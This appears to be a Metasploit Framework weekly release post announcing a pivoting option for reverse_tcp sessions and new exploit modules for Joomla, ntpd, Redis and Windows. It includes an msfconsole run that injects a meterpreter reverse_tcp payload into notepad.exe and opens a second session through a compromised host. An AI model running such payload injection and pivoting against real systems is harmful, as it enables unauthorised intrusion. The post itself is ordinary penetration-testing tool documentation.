Aaaaaand we're back! Last week was the first weekly update of the year and it comes with a super fun stuff.
The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now a new datastore option, ReverseListenerComm, which lets you tell a meterpreter session tunnel connections back to your payload handler. Here's an example run to give you the idea:
msf exploit(payload_inject) > show options Module options (exploit/windows/local/payload_inject): Name Current Setting Required Description ---- --------------- -------- ----------- NEWPROCESS true no New notepad.exe to inject to PID no Process Identifier to inject of process to inject payload. SESSION yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: , , seh, thread, process, none) LHOST 127.0.0.1 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows msf exploit(payload_inject) > set ReverseListenerComm 1 ReverseListenerComm => 1 msf exploit(payload_inject) > set SESSION 1 SESSION => 1 msf exploit(payload_inject) > run [*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1 [*] Running module against WIN-2DE8F2QP867 [*] Launching notepad.exe... [*] Preparing 'windows/meterpreter/reverse_tcp' for PID 3092 [*] Sending stage (884270 bytes) [*] Meterpreter session 2 opened (192.168.5.101-192.168.5.1:4444 -> 127.0.0.1:63173) at 2015-05-20 00:09:44 +0100 meterpreter >
The really important line there is this:
[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1
The compromised machine is listening on its localhost for the new connection, but it doesn't have to be localhost, you can tell it to listen on an external address and use psexec against a second internal machine. This used be possible by creating a route and setting your LHOST to a victim machine's IP address within that route, but it wasn't really clear how to do it and the settings were quite error prone; now it's just a single option to tell Metasploit explicitly where to listen for the payload.
Super fun modules
This update comes with a pre-authentication exploit for Joomla, the popular CMS, another in a rich and storied history of deserialization bugs. We've also abstracted some common things into a Joomla mixin, so the next time one of these comes along, writing the exploit is will be faster and easier.
From the module description:
The end goal is to cause ntpd to declare the legitimate peers "false tickers" and choose the attacking clients as the preferred peers, allowing these peers to control time.
Now you, too, can go... NAK to the Future!
- Joomla HTTP Header Unauthenticated Remote Code Execution by Christian Mehlmauer and Marc-Alexandre Montpas exploits CVE-2015-8562
Auxiliary and post modules
- Android Stock Browser Iframe DOS by Jean Pascal Pereira and Jonathan Waggoner exploits CVE-2012-6301
- NTP "NAK to the Future" by Jon Hart and Matthew Van Gundy of Cisco ASIG exploits CVE-2015-7871
- Redis File Upload by Jon Hart and Nixawk
- MS15-134 Microsoft Windows Media Center MCL Information Disclosure by sinn3r and Francisco Falcon exploits CVE-2015-6127
- Post Windows Gather NTDS.DIT Location by Stuart Morgan
As always, you can get all these modules and improvements with a simple
msfupdate and the full diff is available on GitHub: 4.11.5-2015121501...4.11.5-2016010401